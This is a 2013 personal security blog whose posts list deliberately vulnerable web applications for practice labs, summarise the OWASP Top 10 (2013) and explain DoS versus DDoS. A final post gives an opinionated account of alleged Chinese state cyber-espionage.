Tuesday, September 3, 2013

Web-Application Penetration Testing - List of Vulnerable Web Applications

Hi all of you out there….

This blog is dedicated to all those who want to learn and test their penetration testing skills.

Being a web application security enthusiast, I will be concentrating on “setting up web-app pentesting lab”.

IMPORTANT – Many make mistake of testing live applications which are present in the wild internet. This can cause a huge trouble to the person testing the website (without legal disclaimer) . This can bring a “full-stop” on his/her information career. Perform Pentest only on web applications where you have proper permissions to do so.

Normally a person new to the web-app pentesting can have a question which states following :-
If testing live application without prior permission is not legal, then how can I learn and test my skills?

Well there is a simple solution to this question.
Set up your own lab and start pentesting.
At first, this may sound a little bit cumbersome but believe me, it’s not at all that hard.
What do you have to do when setting up a lab ?

Some may think that they will have to code and develop their own web application and then start pentesting it. If you are thinking such, then please chill…You don’t need to do any coding. (If you know coding then its definitely a plus point but if you don't know then don't worry, you don't need it here in set up) 

There are ready-made “vulnerable” web applications available on Internet. You just need to download them and do a little bit setting on your laptop/PC and then you are all set to go.

I will mention some of the “vulnerable” web application here.  

-----------------------------------------------------------------------------------------------------------


This is a web application which is designed with vulnerabilities already built into it.
For a newbie, this is a perfect application to get started with. 
There are particular tabs provided for each vulnerabilities, you just need to visit the tab and exploit that particular vulnerability.

There are appropriate security settings (low, medium, high) built into this application. 
There is also an "Intrusion Detection System" of PHP namely PHPIDS included in this appplication. By default, it is disabled.
If you want to really test your skills, then set the "security" to "high" and enable PHPIDS. ;-)


-----------------------------------------------------------------------------------------------------------


Main thing I like about this web-app, is the way it has implemented the vulnerabilities.
The vulnerabilities are placed according to the rankings of OWASP TOP 10.

If you get stuck somewhere, don't worry. There is an option of "help" provided for easing your task.



-----------------------------------------------------------------------------------------------------------


OWASP webgoat is another test web-app that can be used to learn and enhance your skills.
The application is a realistic teaching environment, providing users with hints and code to further explain the lesson.
This application is based on J2EE. If you want to try the .NET version then you can visit OWASP WebGoat .NET


-----------------------------------------------------------------------------------------------------------

Hackxor

If you think that you don't want to go "step-by-step" vulnerability exploitation, as it is the case in above web applications, then you can try out "Hackxor".It is a webapp hacking game, where players must locate and exploit vulnerabilities to progress through the story. It is a web app with a plot and a focus on realism&difficulty. Hackxor contains XSS, CSRF, SQLi, ReDoS, DOR, command injection, etc


-----------------------------------------------------------------------------------------------------------

Exploit.co.il

Another good vulnerable web application is "exploit.co.il".
This "Vulnerable Web app" is designed as a learning platform to test various SQL injection Techniques
This is a fully functional web site with a content management system based on fckeditor.


-----------------------------------------------------------------------------------------------------------


This is a good "vulnerable" web application which gives you the look and feel as if you are exploiting live application.
You can learn a lot with Bodgeit. 
Like the above examples, this download will also come as a zipped file. Just extract it and start using.


-----------------------------------------------------------------------------------------------------------


This vulnerable web application was designed particularly for the cause of testing various automated security scanners. This research was named as "Why Johnny can't Pentest? ". (I request you to read this research paper)

WackoPicko is a simulation of picture sharing web app. Find vulnerabilities and see the pics which are not intended for normal user to see.. ;-) It's fun to exploit this web app.


-----------------------------------------------------------------------------------------------------------


The OWASP Hackademic Challenges project implements realistic scenarios with known vulnerabilities in a safe, controllable environment.
Users can attempt to discover and exploit these vulnerabilities in order to learn important concepts of information security through the attacker's perspective


------------------------------------------------------------------------------------------------------------

This are few web applications that I found interesting. 
It is safe from legal perspective and at the same time you will get to learn a lot from them.

Above examples are simple ones and you will get a zipped file in download. You just need to extract and use appropriate server environment. I used XAMPP

If you are not aware about setting up XAMPP then click here.  This link will help you in setting up XAMPP. 
Don't go into much deep. 

If you are not comfortable with setting up XAMPP, then let me know in comments. I will try my best to help you out.

Hope this blog helps you and boost up your infosec career. 

Thank you..



Saturday, May 4, 2013

OWASP Top 10 - 2013 | Shivang Desai


An abstract to OWASP TOP 10 (2013).
Nowadays I am on an urge to give a kick start to my Information Security Career and I have just started with web application security.
On the note to web application security, the best way to start is OWASP.  You can start with www.owasp.org and get a complete inside of what and how to perform web application security.
OWASP – Open Web Application Security Project.
OWASP categorizes web application vulnerabilities and rank them in order according to the impact that particular vulnerability can cause.
OWASP has categorized top 10 vulnerabilities of 2013 and the list is as mentioned below.

Number
TOP-10
AttackVector
(Exploitability)
SecurityWeakness
Prevalence(P), Detectability(D)
Technical Impact
A1
Injection
Easy
P-Common,
D-Average
Severe
A2
Broken Authentication and Session Mngmt.
Average
P-Widespread,
D-Average
Severe
A3
Cross Site Scripting
Average
P- Widespread,
D-Easy
Moderate
A4
Insecure Direct Object Reference
Easy
P- Common,
D-Easy
Moderate
A5
Security Misconfiguration
Easy
P- Widespread,
D-Easy
Moderate
A6
Sensitive Data Exposure
Difficult
P- Uncommon,
D-Average
Severe
A7
Missing function Level Access Control
Easy
P- Common,
D-Average
Moderate
A8
Cross Site Request Forgery (CSRF)
Average
P- Common,
D-Easy
Moderate
A9
Using Components with Known Vulnerabilities
Average
P- Widespread,
D-Difficult
Moderate
A10
Unvalidated Redirects and Forwards.
Average
P- Uncommon,
D-Easy
Moderate

Let’s see abstract of vulnerabilities.

 1.   Injection
At first instance, a newbie may think of SQL-Injection but this first category of OWASP is not only about SQL-Injection but it is not the case. Injection may be found in SQL, LDAP or XPath queries, OS Commands, Program arguments, XML parsers etc. The injection found in SQL is considered is SQL-Injection.
https://www.owasp.org/index.php/Top_10_2013-A1


2.  Broken Authentication and Session Management
Developers always build authentication and session management schemes but building it correctly is difficult and as a result, these custom schemes have flaws in them.
Major flaws can be found in areas such as “logout”, “password management”, “remember me”, “timeouts”, “secret questions”, “account update”, etc. These flaws can even be exploited using XSS, which is the next attack according to OWASP top 10.
https://www.owasp.org/index.php/Top_10_2013-Broken_Authentication_and_Session_Management


3.  Cross Site Scripting (XSS)
XSS is considered as a serious flaw and has numbered third in OWASP top 10 list, which was formerly at second rank.
XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content.
There are three main types of XSS.
-Stored XSS (also called Persistent XSS).
-Reflected XSS.
-DOM based XSS.
https://www.owasp.org/index.php/Top_10_2013-Cross-Site_Scripting_(XSS)


4. Insecure Direct Object References.
Applications frequently use the actual name or key of an object when generating web pages. Applications don’t always verify the user is authorized for the target object. This results in an insecure direct object reference flaw.
https://www.owasp.org/index.php/Top_10_2013-Insecure_Direct_Object_References


5.  Security Misconfigurations.
Security misconfiguration can cause at complete application stack including platform, web server, application server, framework and custom code.
Occasionally this flaw leads to complete system compromise.
https://www.owasp.org/index.php/Top_10_2013-Security_Misconfiguration


6.  Sensitive Data Exposure.
The name itself explains the meaning of this attack. In this attack, the sensitive data of the client and company can be exposed. The sensitive data may consist of login credentials as well as credit card numbers.
This attack may be performed by any individual who have access to sensitive data or the back up of that data. The attacker may even exploit this vulnerability if the encryption is weak.
The external attacker may have trouble to perform this attack due to limited access.
https://www.owasp.org/index.php/Top_10_2013-Sensitive_Data_Exposure


7.  Missing function level Access Control
Applications do not always protect application’s functions properly and this becomes the attack vector for the attackers.
Such flaws allow attackers to access unauthorized functionality. Administrative functions are key targets for this type of attack.
https://www.owasp.org/index.php/Top_10_2013-Missing_Function_Level_Access_Control


8. Cross Site Request Forgery ( CSRF )
CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application.
https://www.owasp.org/index.php/Top_10_2013-Cross-Site_Request_Forgery_(CSRF)


9. Using Components with known vulnerabilities.
Most of the times it happens that the vulnerabilities are patched but few components, say for example a particular router or a particular framework, still consist of vulnerabilities. Developers are not aware about the vulnerabilities in the components they are using. Due to this scenario, the component consisting of vulnerability is focused to outside world and this increases the risk for a particular web application.
https://www.owasp.org/index.php/Top_10_2013-Using_Components_with_Known_Vulnerabilities


10. Unvalidated Redirects and Forwards.
Applications frequently redirect users to other pages, or use internal forwards in a similar manner. Sometimes the target page is specified in an unvalidated parameter, allowing attackers to choose the destination page.
https://www.owasp.org/index.php/Top_10_2013-Unvalidated_Redirects_and_Forwards




Saturday, April 27, 2013

DOS vs DDOS | Shivang Desai

Hey guys,

You must have surely seen sometimes that your favorite website is either down or not working properly.
It may be due to the DOS or DDOS attack.
But what is basically DOS and DDOS attack. Lets check out an abstract introduction which can clear out the basic definition of these both types of attack and difference between them.

DOS basically stands for "Denial-Of-Service". In this attack, the victim website ( or you can say, victims website's server) is flooded with huge tons of requests which leaves it hell busy and as a result the website cannot handle anymore legitimate requests.
The latest DOS attack of 2010 had the capability to send 100 gigabits per second. Well its too much.

DDOS attack's intention is same as that of DOS attack but there are few differences between them.

DDOS stands for Distributed-Denial-Of-Service. It exhibits the same principle as that of DOS attack but the main difference in DDOS attack is that the attack takes place from different resources.


You can say that DOS attack is one-to-one relationship and DDOS is many-to-one.
In DDOS attack, many computers attack the victim at the same time and with massive amount of requests which leaves the victim helpless.

The computers behind DDOS attack are distributed over the globe and could be anywhere.
These computers basically become the part of something called botnets.

Hope this short and simple introduction will make you atleast aware about what is DOS and DDOS.

Thanks and enjoy the weekend.... :-)

Surf safe....Be Safe...



Friday, April 26, 2013

Chinese Cyber Army | Shivang Desai


Hey folks,
The days of simple hacking are fading off and hacking has taken the route of Cyber-Warfare.
Earlier we used to see the news saying ‘xyz’ website got hacked or was defaced by some ‘abc’ hacker.
No matter this is still the scenario but now government has also taking part in hacking and this has given rise to cyber-warfare.

China’s Cyber Army
Nowadays China is drastically growing in fishy hacking stuffs. 
The Indian govt. faced an attack recently. The attack vector was a simple email which was received to senior govt. officials. As soon as they clicked the email, the data that resided on the computer’s ‘C:/ProgramFiles’ was sent somewhere. 
After deep research by Rahul Sasi and his team (Garage for hackers) at nullCon, found that the command and control centre of this malware was located in China.

This was the first scenario and the second reason that forced me to write this blog is the penetration of Chinese Army in India. They penetrated 10 km inside the Indian boundary and Chinese govt. denies on it…. Oh C’mon man! Grow up.

Looking at these scenarios, I thought to write a blog on Chinese Cyber-Army .
Unlike US, China keeps its Cyber activities into secrecy.

First question that would come in mind is “what is Chinese Cyber Army”?
It’s simple. It could be termed as a group of hackers in China who basically performs Cyber-Espionage.
The fact lies here is that China is itself involved in it but denies and states that they are totally unaware about these groups.

Let China deny on it but at the same time, there are some de-facto data which can prove that China is involved in cyber-espionage.

Have you ever heard about “PLA”? It stands for People’s Liberation Army.
The PLA is the world's largest military force, with strength of approximately 2,250,000 personnel.
The PLA comprises five main service branches, consisting of :
PLA Ground Force, 
PLA Navy (PLAN), 
PLA Air Force (PLAAF), 
Second Artillery Corps (strategic missile force), and
the PLA Reserve Force.




Yeah, you guessed correctly. This white building is the image of 12-storied headquarter of PLA. It’s also considered as Unit-61398.

According to the strong proofs by American Intelligence, it has been proved that 90% of the attacks on U.S organizations, corporations and government agencies originate in and around this white building.
The detailed report(http://intelreport.mandiant.com/) provided by well-known information security firm, Mandiant, talks about Chinese hacking groups named “Comment Crew” and “Shanghai Group”. The firm was not able to place the hackers inside the 12-story building, but makes a case there is no other plausible explanation for why so many attacks come out of one comparatively small area.
Kevin Mandia, the founder and chief executive of Mandiant, says that “Either the attacks are coming from the Unit 61398 or the people who run the most-controlled, most-monitored Internet networks in the world are clueless about thousands of people generating attacks from this one neighborhood.
Other Security firms also tracked the “Comment Crew” and reached at the result that this group was state-sponsored.
When this report was officially published in New-York Times, the officials at the Chinese embassy in Washington again insisted that their government does not engage in computer hacking, and that such activity is illegal. LOL..

You must be thinking that how can someone directly point on a country and say that it is directly involved in cybercriminal activities. But let me tell you that this is not the first time that China has showed its smartness.
Let’s see some example :

Larry Wu-Tai Chin worked in the U.S. intelligence community for close to 35 years, all the while providing the PRC (People’s Republic of China) with sensitive classified information. Chin was recruited as a spy by a Chinese Communist Official in 1948, while he was employed as an interpreter at the U.S. Consulate in Shanghai.

Peter Lee
Lee was a Chinese born physicist who worked at Los Alamos nuclear weapons laboratory, and later for TRW, a major California defense contractor. Lee pleaded guilty to lying on Security Clearance forms, and to passing classified national defense information to Chinese scientists on business trips to Beijing.

Chi Mak

Chi Mak is a Chinese-born engineer who worked for L-3 Communications, a California based defense contractor. Chi worked as a support engineer on Navy quiet drive propulsion technology. According to recovered documents, Chi was instructed by his Chinese contacts to join "more professional associations and participate in more seminars with 'special subject matters' and to compile special conference materials on disk
There are many of such examples which insignificantly state that it’s better to be aware of China. http://en.wikipedia.org/wiki/Chinese_intelligence_operations_in_the_United_States

Despite of many evidences, still it is being hard to prove the exact meaning of Chinese Cyber Army. It can’t be exactly said that China is surely involved into it but I will be waiting for the same to be proved.
That’s all for today but will be posting more evidences on Chinese Cyber Army.